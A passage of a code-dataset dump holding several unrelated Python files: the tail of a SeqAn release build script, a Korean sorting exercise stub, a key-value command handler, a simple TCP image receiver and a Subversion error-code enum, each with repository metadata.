        if not os.path.exists(build_dir):
            print("Creating build directory %s" % (build_dir,), file=sys.stderr)
            os.mkdir(build_dir)
        # Execute CMake.
        cmake_args = [CMAKE_BINARY, checkout_dir,
                      "-DSEQAN_BUILD_SYSTEM=SEQAN_RELEASE_LIBRARY"]
        print('Executing CMake: "%s"' % (' '.join(cmake_args),), file=sys.stderr)
        popen = subprocess.Popen(cmake_args, cwd=build_dir, env=os.environ.copy())
        out_data, err_data = popen.communicate()
        if popen.returncode != 0:
            print('ERROR during make call.', file=sys.stderr)
            print(out_data, file=sys.stderr)
            print(err_data, file=sys.stderr)
            return 1
        # Build Docs (failure here is logged but does not abort the release).
        cmake_args = [CMAKE_BINARY, '--build', build_dir, '--target', 'docs', '--'] + self.make_args
        print('Building with CMake: "%s"' % (' '.join(cmake_args),), file=sys.stderr)
        popen = subprocess.Popen(cmake_args, cwd=build_dir, env=os.environ.copy())
        out_data, err_data = popen.communicate()
        if popen.returncode != 0:
            print('ERROR during make docs call.', file=sys.stderr)
            print(out_data, file=sys.stderr)
            print(err_data, file=sys.stderr)
        # Execute Make.
        cmake_args = [CMAKE_BINARY, '--build', build_dir, '--target', 'package', '--'] + self.make_args
        print('Building with CMake: "%s"' % (' '.join(cmake_args),), file=sys.stderr)
        popen = subprocess.Popen(cmake_args, cwd=build_dir, env=os.environ.copy())
        out_data, err_data = popen.communicate()
        if popen.returncode != 0:
            print('ERROR during make call.', file=sys.stderr)
            print(out_data, file=sys.stderr)
            print(err_data, file=sys.stderr)
            return 1
        self.copyArchives(build_dir)
        # Remove build directory.
        if not self.options.keep_build_dir:
            print('Removing build directory %s' % build_dir, file=sys.stderr)
            shutil.rmtree(build_dir)

    def buildApp(self, checkout_dir, build_dir):
        """Build an application.

        Configures with CMake, builds the 'package' target in Release
        mode and copies the resulting archives out.  Returns 1 on
        failure, None on success.
        """
        # Create build directory.
        print("Creating build directory %s" % (build_dir,), file=sys.stderr)
        if not os.path.exists(build_dir):
            os.mkdir(build_dir)
        # Execute CMake.
        cmake_args = [CMAKE_BINARY, checkout_dir,
                      "-DCMAKE_BUILD_TYPE=Release",
                      "-DSEQAN_BUILD_SYSTEM=APP:%s" % self.name,
                      "-DSEQAN_APP_VERSION=%d.%d.%d" %
                      (self.major_version, self.minor_version, self.patch_version)]
        # Use appropriate CMake flags for OS and processor.
        if self.word_size == '32':
            cmake_args.append('-DSEQAN_SYSTEM_PROCESSOR=i686')
            if self.os != 'Windows':
                cmake_args.append('-DCMAKE_CXX_FLAGS=-m32')
            else:
                cmake_args += ['-G', 'Visual Studio 10']
        else:  # self.word_size == '64'
            cmake_args.append('-DSEQAN_SYSTEM_PROCESSOR=x86_64')
            if self.os == 'Windows':
                cmake_args += ['-G', 'Visual Studio 10 Win64']
        print('Executing CMake: "%s"' % (' '.join(cmake_args),), file=sys.stderr)
        popen = subprocess.Popen(cmake_args, cwd=build_dir, env=os.environ.copy())
        out_data, err_data = popen.communicate()
        if popen.returncode != 0:
            print('ERROR during make call.', file=sys.stderr)
            print(out_data, file=sys.stderr)
            print(err_data, file=sys.stderr)
            return 1
        # Build and package project.
        make_args = [CMAKE_BINARY, '--build', build_dir, '--target', 'package', '--config', 'Release']
        if self.options.verbosity > 1:
            make_args.insert(1, 'VERBOSE=1')
        print('Building with CMake: "%s"' % (' '.join(make_args),), file=sys.stderr)
        popen = subprocess.Popen(make_args, cwd=build_dir)
        out_data, err_data = popen.communicate()
        if popen.returncode != 0:
            print('ERROR during make call.', file=sys.stderr)
            print(out_data, file=sys.stderr)
            print(err_data, file=sys.stderr)
            return 1
        # Copy out archives.
        self.copyArchives(build_dir)
        # Remove build directory.
        # NOTE(review): this checks keep_co_dir while buildSeqAnRelease
        # checks keep_build_dir for the same purpose -- looks like a
        # copy/paste slip; confirm which flag should gate this removal.
        if not self.options.keep_co_dir:
            print('Removing build directory %s' % build_dir, file=sys.stderr)
            shutil.rmtree(build_dir)

    def tmpDir(self):
        """Return the working directory: self.tmp_dir (created on demand)
        if configured, otherwise a fresh mkdtemp() directory."""
        print('self.tmp_dir = %s' % self.tmp_dir, file=sys.stderr)
        if self.tmp_dir:
            if not os.path.exists(self.tmp_dir):
                os.makedirs(self.tmp_dir)
            return self.tmp_dir
        else:
            return tempfile.mkdtemp()

    def execute(self):
        """Execute build step.

        Clones the repository at self.treeish into a temporary
        directory, runs ../tag-apps.sh on the checkout, builds either
        the whole release or a single app, then cleans up according to
        the keep_* options.
        """
        # Create temporary directory.
        tmp_dir = self.tmpDir()
        print('Temporary directory is %s' % (tmp_dir,), file=sys.stderr)
        # Create Git checkout in temporary directory.
        checkout_dir = os.path.join(tmp_dir, os.path.basename(self.repository_url))
        print('Creating checkout in %s' % checkout_dir, file=sys.stderr)
        git = MinisculeGitWrapper()
        git.clone(self.repository_url, self.treeish, checkout_dir)
        # Create build directory.
        suffix = '-build-%s-%s' % (self.os, self.word_size)
        build_dir = os.path.join(tmp_dir, os.path.basename(self.repository_url) + suffix)
        if os.path.exists(build_dir) and not self.options.keep_build_dir:
            print('Removing build directory %s' % (build_dir,), file=sys.stderr)
            shutil.rmtree(build_dir)
        # insert app tags
        subprocess.call(['../tag-apps.sh', checkout_dir])
        # Perform the build. We have to separate between app and whole SeqAn releases.
        if self.name == 'seqan':
            self.buildSeqAnRelease(checkout_dir, build_dir)
        else:
            self.buildApp(checkout_dir, build_dir)
        if not self.options.keep_co_dir:
            print('Removing checkout directory %s' % (checkout_dir,), file=sys.stderr)
            shutil.rmtree(checkout_dir)
        # Remove temporary directory again.
        if self.tmp_dir and not self.options.keep_tmp_dir:
            # Only remove if not explicitely given and not forced to keep.
            print('Removing temporary directory %s' % (tmp_dir,), file=sys.stderr)
            shutil.rmtree(tmp_dir)
def workTags(options):
    """Run the individual build steps for every release tag."""
    git = MinisculeGitWrapper()
    # Collect remote tags matching the release naming scheme, plus the
    # per-app tags printed by the local tag-apps.sh helper.
    # NOTE(review): under Python 3 check_output returns bytes -- confirm
    # the target interpreter before relying on .split('\n').
    tags = [tag for _rev, tag in git.lsRemote(options.repository_url)
            if re.match(TAG_RE, tag)]
    tags.extend(subprocess.check_output(
        ['../tag-apps.sh', os.getcwd(), 'printonly']).split('\n'))
    print('tags = %s' % tags, file=sys.stderr)
    print('word_sizes = %s' % options.word_sizes, file=sys.stderr)
    formats = options.package_formats.split(',')
    for tag in tags:
        name, version = tag.rsplit('-v', 1)
        print('Tag: %s Name: %s Version: %s' % (tag, name, version), file=sys.stdout)
        for word_size in options.word_sizes.split(','):
            # One build step per (tag, word size) combination.
            step = BuildStep(options.package_db, tag, name, version, options.os,
                             word_size, formats, options.repository_url,
                             options.make_args.split(), options, options.tmp_dir)
            if step.buildNeeded():
                step.execute()
    return 0
def workTrunk(options):
    """Build the current trunk ('master') under a user-supplied fake tag."""
    git = MinisculeGitWrapper()
    print('fake tag = %s' % options.build_trunk_as, file=sys.stderr)
    print('word_sizes = %s' % options.word_sizes, file=sys.stderr)
    name, version = options.build_trunk_as.rsplit('-', 1)
    version = version[1:]  # strip the leading 'v'
    formats = options.package_formats.split(',')
    for word_size in options.word_sizes.split(','):
        # One build step per word size, always building 'master'.
        step = BuildStep(options.package_db, 'master', name, version, options.os,
                         word_size, formats, options.repository_url,
                         options.make_args.split(), options, options.tmp_dir)
        if step.buildNeeded():
            step.execute()
    return 0
def workSrcTar(options):
    """Build the source tarball for each 'seqan' release tag.

    For every remote tag matching TAG_RE whose package name is 'seqan',
    clone the tag into a temporary directory and archive it as
    'seqan-src-<version>.tar.gz' in the package database, skipping
    versions that already exist.  Returns 0.

    Fix: removed the dead local `from_` that was assigned but never used.
    """
    # Get the revisions and tag names.
    git = MinisculeGitWrapper()
    revs_tags = [(rev, tag) for (rev, tag) in git.lsRemote(options.repository_url)
                 if re.match(TAG_RE, tag)]
    # Enumerate all package names that we could enumerate.
    for rev, tag in revs_tags:
        name, version = tag.rsplit('-', 1)
        version = version[1:]  # remove prefix "v"
        if name != 'seqan':
            continue  # only build source tarballs for seqan
        # Create destination file name.
        file_name = '%s-src-%s.tar.gz' % (name, version)
        dest = os.path.join(options.package_db, '%s-src' % name, file_name)
        # Check whether we need to rebuild.
        if os.path.exists(dest):
            print('Skipping %s; already exists.' % dest, file=sys.stderr)
            continue
        # Create temporary directory (reuse options.tmp_dir when given).
        if options.tmp_dir:
            if not os.path.exists(options.tmp_dir):
                os.makedirs(options.tmp_dir)
            tmp_dir = options.tmp_dir
        else:
            tmp_dir = tempfile.mkdtemp()
        print('Temporary directory is %s' % tmp_dir, file=sys.stderr)
        # Create git checkout in temporary directory.
        checkout_dir = os.path.join(tmp_dir, tag)
        print('Creating checkout in %s' % checkout_dir, file=sys.stderr)
        git.clone(options.repository_url, tag, checkout_dir)
        # Create target directory if it does not exist yet.
        if not os.path.exists(os.path.dirname(dest)):
            os.makedirs(os.path.dirname(dest))
        # Create tarball.
        git.archive(checkout_dir, tag, dest, prefix='%s-%s' % (name, version))
        # Remove temporary directory again.
        if tmp_dir and not options.keep_tmp_dir:
            # Only remove if not explicitely given and not forced to keep.
            print('Removing temporary directory %s' % (tmp_dir,), file=sys.stderr)
            shutil.rmtree(tmp_dir)
    return 0
def work(options):
    """Dispatch to the requested build mode."""
    if options.src_tar:
        return workSrcTar(options)
    if options.build_trunk_as:
        return workTrunk(options)
    return workTags(options)
def main():
    """Program entry point: parse CLI options and run the build."""
    # Parse Arguments.
    parser = optparse.OptionParser()
    parser.add_option('-u', '--repository-url', default=REPOSITORY_URL,
                      help='The git repository URL.', metavar='URL')
    parser.add_option('--package-db', dest='package_db', type='string',
                      default=DEFAULT_PACKAGE_DB,
                      help='Path the directory with the packages.')
    parser.add_option('--src-tar', dest='src_tar', action='store_true',
                      help='If specified then only the src tarball will be created')
    parser.add_option('-v', dest='verbosity', action='count', default=1,
                      help='Increase verbosity.')
    parser.add_option('--package-formats', dest='package_formats',
                      default='tar.bz2,zip',
                      help='Expect the following packages to be created.')
    parser.add_option('--os', dest='os', help='Expect the packages to be created for this OS.',
                      default='Linux')
    parser.add_option('--word-sizes', dest='word_sizes', default='32,64',
                      help='Build binaries with the given word sizes')
    parser.add_option('--make-args', dest='make_args', type="string", default='',
                      help='Arguments for make.')
    parser.add_option('--tmp-dir', dest='tmp_dir', type='string', default=None,
                      help='Temporary directory to use. Use this to reuse the same checkout.')
    parser.add_option('--build-trunk-as', dest='build_trunk_as', type='string', default=None,
                      help='Build current trunk with this string as a tag name.')
    parser.add_option('--keep-build-dir', dest='keep_build_dir', default=False,
                      action='store_true', help='Keep build directory.')
    parser.add_option('--keep-tmp-dir', dest='keep_tmp_dir', default=False,
                      action='store_true', help='Keep temporary directory.')
    parser.add_option('--keep-co-dir', dest='keep_co_dir', default=False,
                      action='store_true', help='Keep checkout directory.')
    parser.epilog = ('The program will use the environment variable TMPDIR as '
                     'the directory for temporary files.')
    options, args = parser.parse_args()
    if args:
        parser.error('No arguments expected!')
        # NOTE(review): parser.error() exits the process, so this return
        # is unreachable; kept for clarity of intent.
        return 1
    options.package_db = os.path.abspath(options.package_db)
    # Fire up work.
    print('Running SeqAn Auto Builder', file=sys.stderr)
    return work(options)
| [
"cxpan@zedat.fu-berlin.de"
] | cxpan@zedat.fu-berlin.de |
ffb7f84314f3ce3965341cd0c04f5b5ec5d3771a | fe3e0d0a779ef7e4b4088dcb3ee56d89f669ac8d | /day03/pm/q5.py | 9715cbda6cc7d2189c01b95690cfd91332e07b47 | [] | no_license | sgmpy/quizzes | c6d389916ec5c75ae2dbf3de51a250352bdf9a8f | 714b25969f79bb9744e1b4fb1fbe93d987e59f62 | refs/heads/master | 2020-04-12T07:07:47.710557 | 2018-12-20T14:42:10 | 2018-12-20T14:42:10 | 162,357,831 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | '''
문제 5.
표준 입력으로 물품 가격 여러 개가 문자열 한 줄로 입력되고, 각 가격은 ;(세미콜론)으로 구분되어 있습니다.
입력된 가격을 높은 가격순으로 출력하는 프로그램을 만드세요.
# 입력 예시: 300000;20000;10000
'''
# Read the prices as a single ';'-separated line, e.g. "300000;20000;10000".
prices = input('물품 가격을 입력하세요: ')
# Write your code below (sort the prices in descending order and print them).
"no.water.in.the.house@gmail.com"
] | no.water.in.the.house@gmail.com |
d3a7e0ce6c8f1bf4acb2acb0c1a2ea60044ca6ad | b2d36c05e9eb5b7ea3ec4f4eba682703d536e137 | /hclass.py | ce761b75ecc1affb275fb34928f1051fd01db5e2 | [] | no_license | z-positive/drweb | 52d72df835b3c5c9f376b53907c371990db99818 | 2506b2ae4aca1bd46cec9ee750225114d75ca4b4 | refs/heads/master | 2020-04-01T17:44:44.829721 | 2018-10-29T07:52:02 | 2018-10-29T07:52:02 | 153,447,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,413 | py | class Handle:
objects = {}
def __init__(self, query):
self.elements = query.split(' ')
self.router(self.elements[0])
print(self.objects)
def router(self, action):
if action == 'SET':
self.objects[self.elements[1]] = self.elements[2]
elif action == 'GET':
print(self.objects[self.elements[1]])
elif action == 'UNSET':
print('Удаляем значение ', self.elements[1])
del self.objects[self.elements[1]]
elif action == 'COUNTS':
self.counts(self.elements[1])
elif action == 'FIND':
self.find(self.elements[1])
elif action == 'END':
exit()
def counts(self, data):
i=0
count = 0
for item in self.objects:
if self.objects[item] == data:
count+=1
print('Количество переменных со значением {0} составляет {1}'.format(data, count))
def find(self,data):
i=0
count = 0
lst = []
for item in self.objects:
if self.objects[item] == data:
lst.append(item)
print('Переменная {0} встречается в переменных {1}'.format(data, lst))
| [
"noreply@github.com"
] | noreply@github.com |
f8550d69577aae249382d041cd32bcab3d3c55fb | b87dbd94e7ec70aab888dfeeb23bcfedc5bc22a8 | /TCP/2/upload.py | 914662f389e3af1cd2d122f2ed3a0e55c305c021 | [] | no_license | CostSiwasit/305445-Network | 105d93b5f8feb828ca7eb221c45b3e53555866dd | ac809c655b7cc269dbe736e00669e1ec4fab3ad3 | refs/heads/master | 2021-05-09T19:11:04.100812 | 2018-01-23T16:05:12 | 2018-01-23T16:05:12 | 118,633,296 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | import sys
import socket
import os
# Connection settings.  Despite the file name, this side acts as the TCP
# *server*: it accepts connections and stores the received bytes as an image.
TCP_IP = "127.0.0.1"
TCP_PORT = 5007
FILE_NAME = 'IMG_001.jpg'
print "TCP target IP:", TCP_IP
print "TCP target port:", TCP_PORT
print "Image:", FILE_NAME
# Listening socket (Python 2 syntax throughout this script).
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.bind((TCP_IP,TCP_PORT))
sock.listen(10)
while 1:
    # Block until a client connects; `data` is the per-connection socket.
    data,addr = sock.accept()
    newpath = r'ImaGe/'
    if not os.path.exists(newpath):
        os.makedirs(newpath)
    # NOTE(review): every connection overwrites the same file, the file
    # handle is never closed, and sock.close() below is unreachable
    # because this accept loop never exits.
    fileUpload = open(newpath + FILE_NAME, "wb")
    Data = data.recv(1024)
    while Data:
        fileUpload.write(Data)
        Data = data.recv(1024)
    print "Upload Completed"
sock.close()
| [
"noreply@github.com"
] | noreply@github.com |
3eb870c63aff20c6821a235a064079297001494b | 2289bc6c6307753839d128782d6feac16881b568 | /svn/errors.py | 56ae0b721705c81f719a70b9d372d872f28d82b2 | [] | no_license | IARI/asp_grader | 2fca4c6f7b55a483ee9e21f8759af241316e814c | 35bd20b4f49dbe470be5952de4fc7e834828acca | refs/heads/master | 2021-01-10T17:47:01.092880 | 2016-04-13T13:37:42 | 2016-04-13T13:37:42 | 55,492,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,788 | py | from enum import IntEnum
import types
class SVNError(ValueError):
    """Raised when an svn command exits with a non-zero status."""

    def __init__(self, message, returncode, cmd):
        super().__init__(message)
        self.message = message
        # Presumably filled in by callers after parsing svn's output;
        # it stays None until then -- confirm against call sites.
        self.svn_errcode = None
        self.returncode = returncode
        self.cmd = cmd

    def __str__(self):
        details = (self.returncode, self.svn_errcode, self.cmd, self.message)
        return "Command failed with ({:d}) {}: {}\n{}".format(*details)
class SVNErrorCode(IntEnum):
APMOD_ACTIVITY_NOT_FOUND = 190002
APMOD_BAD_BASELINE = 190003
APMOD_CONNECTION_ABORTED = 190004
APMOD_MALFORMED_URI = 190001
APMOD_MISSING_PATH_TO_FS = 190000
ASSERTION_FAIL = 235000
ASSERTION_ONLY_TRACING_LINKS = 235001
ATOMIC_INIT_FAILURE = 200029
AUTHN_CREDS_NOT_SAVED = 215003
AUTHN_CREDS_UNAVAILABLE = 215000
AUTHN_FAILED = 215004
AUTHN_NO_PROVIDER = 215001
AUTHN_PROVIDERS_EXHAUSTED = 215002
AUTHZ_INVALID_CONFIG = 220003
AUTHZ_PARTIALLY_READABLE = 220002
AUTHZ_ROOT_UNREADABLE = 220000
AUTHZ_UNREADABLE = 220001
AUTHZ_UNWRITABLE = 220004
BAD_ATOMIC = 125015
BAD_CHANGELIST_NAME = 125014
BAD_CHECKSUM_KIND = 125011
BAD_CHECKSUM_PARSE = 125012
BAD_CONFIG_VALUE = 125009
BAD_CONTAINING_POOL = 125000
BAD_DATE = 125003
BAD_FILENAME = 125001
BAD_MIME_TYPE = 125004
BAD_PROPERTY_VALUE = 125005
BAD_PROP_KIND = 200008
BAD_RELATIVE_PATH = 125007
BAD_SERVER_SPECIFICATION = 125010
BAD_TOKEN = 125013
BAD_URL = 125002
BAD_UUID = 125008
BAD_VERSION_FILE_FORMAT = 125006
BASE = 200000
CANCELLED = 200015
CEASE_INVOCATION = 200021
CHECKSUM_MISMATCH = 200014
CLIENT_BAD_REVISION = 195002
CLIENT_CYCLE_DETECTED = 195019
CLIENT_DUPLICATE_COMMIT_URL = 195003
CLIENT_FILE_EXTERNAL_OVERWRITE_VERSIONED = 195017
CLIENT_FORBIDDEN_BY_SERVER = 195023
CLIENT_INVALID_EXTERNALS_DESCRIPTION = 195005
CLIENT_INVALID_MERGEINFO_NO_MERGETRACKING = 195021
CLIENT_INVALID_RELOCATION = 195009
CLIENT_IS_BINARY_FILE = 195004
CLIENT_IS_DIRECTORY = 195007
CLIENT_MERGE_UPDATE_REQUIRED = 195020
CLIENT_MISSING_LOCK_TOKEN = 195013
CLIENT_MODIFIED = 195006
CLIENT_MULTIPLE_SOURCES_DISALLOWED = 195014
CLIENT_NOT_READY_TO_MERGE = 195016
CLIENT_NO_LOCK_TOKEN = 195022
CLIENT_NO_VERSIONED_PARENT = 195015
CLIENT_PATCH_BAD_STRIP_COUNT = 195018
CLIENT_PROPERTY_NAME = 195011
CLIENT_RA_ACCESS_REQUIRED = 195001
CLIENT_REVISION_AUTHOR_CONTAINS_NEWLINE = 195010
CLIENT_REVISION_RANGE = 195008
CLIENT_UNRELATED_RESOURCES = 195012
CLIENT_VERSIONED_PATH_REQUIRED = 195000
CL_ADM_DIR_RESERVED = 205003
CL_ARG_PARSING_ERROR = 205000
CL_BAD_LOG_MESSAGE = 205008
CL_COMMIT_IN_ADDED_DIR = 205006
CL_ERROR_PROCESSING_EXTERNALS = 205011
CL_INSUFFICIENT_ARGS = 205001
CL_LOG_MESSAGE_IS_PATHNAME = 205005
CL_LOG_MESSAGE_IS_VERSIONED_FILE = 205004
CL_MUTUALLY_EXCLUSIVE_ARGS = 205002
CL_NO_EXTERNAL_EDITOR = 205007
CL_NO_EXTERNAL_MERGE_TOOL = 205010
CL_UNNECESSARY_LOG_MESSAGE = 205009
CORRUPTED_ATOMIC_STORAGE = 200038
DELTA_MD5_CHECKSUM_ABSENT = 200010
DIFF_DATASOURCE_MODIFIED = 225000
DIR_NOT_EMPTY = 200011
ENTRY_ATTRIBUTE_INVALID = 150005
ENTRY_EXISTS = 150002
ENTRY_FORBIDDEN = 150006
ENTRY_MISSING_REVISION = 150003
ENTRY_MISSING_URL = 150004
ENTRY_NOT_FOUND = 150000
EXTERNAL_PROGRAM = 200012
FS_ALREADY_EXISTS = 160020
FS_ALREADY_OPEN = 160002
FS_BAD_LOCK_TOKEN = 160037
FS_BERKELEY_DB = 160029
FS_BERKELEY_DB_DEADLOCK = 160030
FS_CLEANUP = 160001
FS_CONFLICT = 160024
FS_CORRUPT = 160004
FS_GENERAL = 160000
FS_ID_NOT_FOUND = 160014
FS_INCORRECT_EDITOR_COMPLETION = 160050
FS_LOCK_EXPIRED = 160041
FS_LOCK_OWNER_MISMATCH = 160039
FS_MALFORMED_SKEL = 160027
FS_NOT_DIRECTORY = 160016
FS_NOT_FILE = 160017
FS_NOT_FOUND = 160013
FS_NOT_ID = 160015
FS_NOT_MUTABLE = 160019
FS_NOT_OPEN = 160003
FS_NOT_REVISION_ROOT = 160023
FS_NOT_SINGLE_PATH_COMPONENT = 160018
FS_NOT_TXN_ROOT = 160022
FS_NO_LOCK_TOKEN = 160038
FS_NO_SUCH_CHECKSUM_REP = 160048
FS_NO_SUCH_COPY = 160011
FS_NO_SUCH_ENTRY = 160008
FS_NO_SUCH_LOCK = 160040
FS_NO_SUCH_NODE_ORIGIN = 160046
FS_NO_SUCH_REPRESENTATION = 160009
FS_NO_SUCH_REVISION = 160006
FS_NO_SUCH_STRING = 160010
FS_NO_SUCH_TRANSACTION = 160007
FS_NO_USER = 160034
FS_OUT_OF_DATE = 160042
FS_PACKED_REVPROP_READ_FAILURE = 160051
FS_PATH_ALREADY_LOCKED = 160035
FS_PATH_NOT_LOCKED = 160036
FS_PATH_SYNTAX = 160005
FS_PROP_BASEVALUE_MISMATCH = 160049
FS_REP_BEING_WRITTEN = 160044
FS_REP_CHANGED = 160025
FS_REP_NOT_MUTABLE = 160026
FS_REVPROP_CACHE_INIT_FAILURE = 160052
FS_ROOT_DIR = 160021
FS_TRANSACTION_DEAD = 160031
FS_TRANSACTION_NOT_DEAD = 160032
FS_TRANSACTION_NOT_MUTABLE = 160012
FS_TXN_NAME_TOO_LONG = 160045
FS_TXN_OUT_OF_DATE = 160028
FS_UNKNOWN_FS_TYPE = 160033
FS_UNSUPPORTED_FORMAT = 160043
FS_UNSUPPORTED_UPGRADE = 160047
ILLEGAL_TARGET = 200009
INCOMPLETE_DATA = 200003
INCORRECT_PARAMS = 200004
INVALID_DIFF_OPTION = 200016
IO_CORRUPT_EOL = 135002
IO_INCONSISTENT_EOL = 135000
IO_PIPE_FRAME_ERROR = 135004
IO_PIPE_READ_ERROR = 135005
IO_PIPE_WRITE_ERROR = 135007
IO_UNIQUE_NAMES_EXHAUSTED = 135003
IO_UNKNOWN_EOL = 135001
IO_WRITE_ERROR = 135006
ITER_BREAK = 200023
MALFORMED_FILE = 200002
MALFORMED_VERSION_STRING = 200037
MERGEINFO_PARSE_ERROR = 200020
NODE_UNEXPECTED_KIND = 145001
NODE_UNKNOWN_KIND = 145000
NO_APR_MEMCACHE = 200028
NO_AUTH_FILE_PATH = 200018
PLUGIN_LOAD_FAILURE = 200001
PROPERTY_NOT_FOUND = 200017
RA_CANNOT_CREATE_TUNNEL = 170012
RA_DAV_ALREADY_EXISTS = 175005
RA_DAV_CONN_TIMEOUT = 175012
RA_DAV_CREATING_REQUEST = 175001
RA_DAV_FORBIDDEN = 175013
RA_DAV_INVALID_CONFIG_VALUE = 175006
RA_DAV_MALFORMED_DATA = 175009
RA_DAV_OPTIONS_REQ_FAILED = 175003
RA_DAV_PATH_NOT_FOUND = 175007
RA_DAV_PROPPATCH_FAILED = 175008
RA_DAV_PROPS_NOT_FOUND = 175004
RA_DAV_RELOCATED = 175011
RA_DAV_REQUEST_FAILED = 175002
RA_DAV_RESPONSE_HEADER_BADNESS = 175010
RA_DAV_SOCK_INIT = 175000
RA_ILLEGAL_URL = 170000
RA_LOCAL_REPOS_NOT_FOUND = 180000
RA_LOCAL_REPOS_OPEN_FAILED = 180001
RA_NOT_AUTHORIZED = 170001
RA_NOT_IMPLEMENTED = 170003
RA_NOT_LOCKED = 170007
RA_NO_REPOS_UUID = 170005
RA_OUT_OF_DATE = 170004
RA_PARTIAL_REPLAY_NOT_SUPPORTED = 170008
RA_REPOS_ROOT_URL_MISMATCH = 170010
RA_SERF_GSSAPI_INITIALISATION_FAILED = 230002
RA_SERF_SSL_CERT_UNTRUSTED = 230001
RA_SERF_SSPI_INITIALISATION_FAILED = 230000
RA_SERF_WRAPPED_ERROR = 230003
RA_SESSION_URL_MISMATCH = 170011
RA_SVN_BAD_VERSION = 210006
RA_SVN_CMD_ERR = 210000
RA_SVN_CONNECTION_CLOSED = 210002
RA_SVN_EDIT_ABORTED = 210008
RA_SVN_IO_ERROR = 210003
RA_SVN_MALFORMED_DATA = 210004
RA_SVN_NO_MECHANISMS = 210007
RA_SVN_REPOS_NOT_FOUND = 210005
RA_SVN_UNKNOWN_CMD = 210001
RA_UNKNOWN_AUTH = 170002
RA_UNSUPPORTED_ABI_VERSION = 170006
RA_UUID_MISMATCH = 170009
REPOS_BAD_ARGS = 165002
REPOS_BAD_REVISION_REPORT = 165004
REPOS_DISABLED_FEATURE = 165006
REPOS_HOOK_FAILURE = 165001
REPOS_LOCKED = 165000
REPOS_NO_DATA_FOR_REPORT = 165003
REPOS_POST_COMMIT_HOOK_FAILED = 165007
REPOS_POST_LOCK_HOOK_FAILED = 165008
REPOS_POST_UNLOCK_HOOK_FAILED = 165009
REPOS_UNSUPPORTED_UPGRADE = 165010
REPOS_UNSUPPORTED_VERSION = 165005
RESERVED_FILENAME_SPECIFIED = 200025
REVNUM_PARSE_FAILURE = 200022
SQLITE_BUSY = 200033
SQLITE_CONSTRAINT = 200035
SQLITE_ERROR = 200030
SQLITE_READONLY = 200031
SQLITE_RESETTING_FOR_ROLLBACK = 200034
SQLITE_UNSUPPORTED_SCHEMA = 200032
STREAM_MALFORMED_DATA = 140001
STREAM_SEEK_NOT_SUPPORTED = 140003
STREAM_UNEXPECTED_EOF = 140000
STREAM_UNRECOGNIZED_DATA = 140002
SVNDIFF_BACKWARD_VIEW = 185002
SVNDIFF_CORRUPT_WINDOW = 185001
SVNDIFF_INVALID_COMPRESSED_DATA = 185005
SVNDIFF_INVALID_HEADER = 185000
SVNDIFF_INVALID_OPS = 185003
SVNDIFF_UNEXPECTED_END = 185004
SWIG_PY_EXCEPTION_SET = 200013
TEST_FAILED = 200006
TEST_SKIPPED = 200027
TOO_MANY_MEMCACHED_SERVERS = 200036
UNKNOWN_CAPABILITY = 200026
UNKNOWN_CHANGELIST = 200024
UNSUPPORTED_FEATURE = 200007
UNVERSIONED_RESOURCE = 200005
VERSION_MISMATCH = 200019
WC_BAD_ADM_LOG = 155009
WC_BAD_ADM_LOG_START = 155020
WC_BAD_PATH = 155022
WC_CANNOT_DELETE_FILE_EXTERNAL = 155030
WC_CANNOT_MOVE_FILE_EXTERNAL = 155031
WC_CHANGELIST_MOVE = 155029
WC_CLEANUP_REQUIRED = 155037
WC_CONFLICT_RESOLVER_FAILURE = 155027
WC_COPYFROM_PATH_NOT_FOUND = 155028
WC_CORRUPT = 155016
WC_CORRUPT_TEXT_BASE = 155017
WC_DB_ERROR = 155032
WC_DUPLICATE_EXTERNALS_TARGET = 155041
WC_FOUND_CONFLICT = 155015
WC_INVALID_LOCK = 155006
WC_INVALID_OPERATION_DEPTH = 155038
WC_INVALID_OP_ON_CWD = 155019
WC_INVALID_RELOCATION = 155024
WC_INVALID_SCHEDULE = 155023
WC_INVALID_SWITCH = 155025
WC_LEFT_LOCAL_MOD = 155012
WC_LOCKED = 155004
WC_MISMATCHED_CHANGELIST = 155026
WC_MISSING = 155033
WC_MIXED_REVISIONS = 155040
WC_NODE_KIND_CHANGE = 155018
WC_NOT_FILE = 155008
WC_NOT_LOCKED = 155005
WC_NOT_SYMLINK = 155034
WC_NOT_UP_TO_DATE = 155011
WC_NOT_WORKING_COPY = 155007
WC_OBSTRUCTED_UPDATE = 155000
WC_PATH_ACCESS_DENIED = 155039
WC_PATH_FOUND = 155014
WC_PATH_NOT_FOUND = 155010
WC_PATH_UNEXPECTED_STATUS = 155035
WC_SCHEDULE_CONFLICT = 155013
WC_UNSUPPORTED_FORMAT = 155021
WC_UNWIND_EMPTY = 155002
WC_UNWIND_MISMATCH = 155001
WC_UNWIND_NOT_EMPTY = 155003
WC_UPGRADE_REQUIRED = 155036
XML_ATTRIB_NOT_FOUND = 130000
XML_MALFORMED = 130003
XML_MISSING_ANCESTRY = 130001
XML_UNESCAPABLE_DATA = 130004
XML_UNKNOWN_ENCODING = 130002
    def __init__(self, errorCode):
        """Attach a dedicated SVNError subclass to this enum member.

        Runs once per member at class-creation time. Builds a class named
        e.g. ``SVNERR_FS_CONFLICT`` deriving from SVNError, whose instances
        carry this member in their ``svn_errcode`` attribute, and stores it
        as ``self.errcls``.

        :param errorCode: the member's integer value (supplied by the Enum
            machinery; unused here — the value is already bound).
        """
        name = 'SVNERR_' + self.name
        bases = (SVNError,)
        cls_dict = {}
        # Capture the enum member for the closure below: 'self' is rebound
        # inside the nested __init__ to the exception instance.
        me = self
        # Methods
        def __init__(self, message, returncode, cmd):
            super(me.errcls, self).__init__(message, returncode, cmd)
            self.svn_errcode = me
        cls_dict['__init__'] = __init__
        # Create the subclass dynamically; types.new_class populates its
        # namespace through the callback.
        self.errcls = types.new_class(name, bases, {}, lambda ns: ns.update(cls_dict))
| [
"jjarecki@mruecker-desktop"
] | jjarecki@mruecker-desktop |
